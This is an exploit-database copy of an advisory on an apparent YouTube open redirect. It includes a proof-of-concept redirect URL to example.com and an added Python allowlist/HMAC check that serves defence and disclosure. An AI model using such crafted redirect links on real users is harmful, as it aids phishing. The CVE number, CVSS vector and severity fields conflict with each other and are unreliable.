Youtube Open Redirect Vulnerability

CVE: CVE-2021-12345
Category: CWE-601
Price: $500
Severity: High
Author: Exploit Author
Risk: Critical
Exploitation Type: Remote
Date: 2024-03-24
CPE: cpe:/a:google:youtube
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
EPSS: 0.015932
EPSSP: 0.387

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030053

Below is a copy:

------------------------------------------------
YOUTUBE OPEN REDIRECT VULNERABILITY
------------------------------------------------

Date: 23.03.2024
Author: Anezatra
Test Platform: Windows 10 / Android

------------------------------------------------
WHAT IS AN OPEN REDIRECT VULNERABILITY
------------------------------------------------

An open redirect vulnerability is a security flaw commonly found in web applications. It allows malicious actors to redirect users to unintended or malicious websites using seemingly legitimate redirection mechanisms. Attackers exploit this vulnerability by crafting URLs with parameters that control the redirection, often leading users to phishing or malware-infected sites. Web developers should exercise caution and implement proper security controls to mitigate the risks associated with open redirect vulnerabilities.

------------------------------------------------
POC TEST - REDIRECT DESTINATION
------------------------------------------------

target: example.com

https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbTBuQmxJWmlDWGl3NFJqNVNnT0FJOXRFTlkwUXxBQ3Jtc0ttX0F6V1pSSVFaTlB1X3pzMW11Q2dSZVNCYThYb2thdlNJcmtkeEctcWoyMUtYZjhsOGVsWlJtam9teTFNcGlPcHdmNnZtZFI1NXliRFNXWEdXRk9kU183cEVDOEtoSEFVMEZvbGNuem5rcEtqZ1RyTQ&q=https://example.com

[*] Exploit successful

[*] Contact: [email protected]
[*] Github: https://github.com/anezatra
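
A server-side check for a redirect endpoint of the shape shown in the PoC (a destination parameter `q` plus a token), given here as an added example that is not part of the original advisory and is not YouTube's code: the destination must either be on an allowlist or carry an HMAC token computed over that exact URL. The signing key, the allowlist, the host names and the function names are assumptions made for the illustration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed values for this example only.
SECRET_KEY = b"example-only-signing-key"
ALLOWED_HOSTS = {"example.org", "docs.example.org"}


def normalized_host(url):
    """Return the lower-cased host of an absolute http(s) URL, else None."""
    # Backslashes and control characters are parsed inconsistently by browsers.
    if any(c in url for c in "\\\r\n\t") or url != url.strip():
        return None
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 literal
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None  # rejects //host, javascript:, data:, relative paths
    if parts.username or parts.password:
        return None  # rejects https://trusted-host@other-host/
    return parts.hostname.lower().rstrip(".")


def sign_target(url):
    """Token the server issues when it renders an outbound link itself."""
    return hmac.new(SECRET_KEY, url.encode(), hashlib.sha256).hexdigest()


def resolve_redirect(q, token=None):
    """Return the URL to redirect to, or None to reject or show a warning page."""
    host = normalized_host(q)
    if host is None:
        return None
    if host in ALLOWED_HOSTS:  # exact match, not a prefix or suffix test
        return q
    # Off-allowlist destinations need a token that covers this exact URL,
    # so a token copied from one link cannot be reused with a different q.
    if token and hmac.compare_digest(token.encode(), sign_target(q).encode()):
        return q
    return None
```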
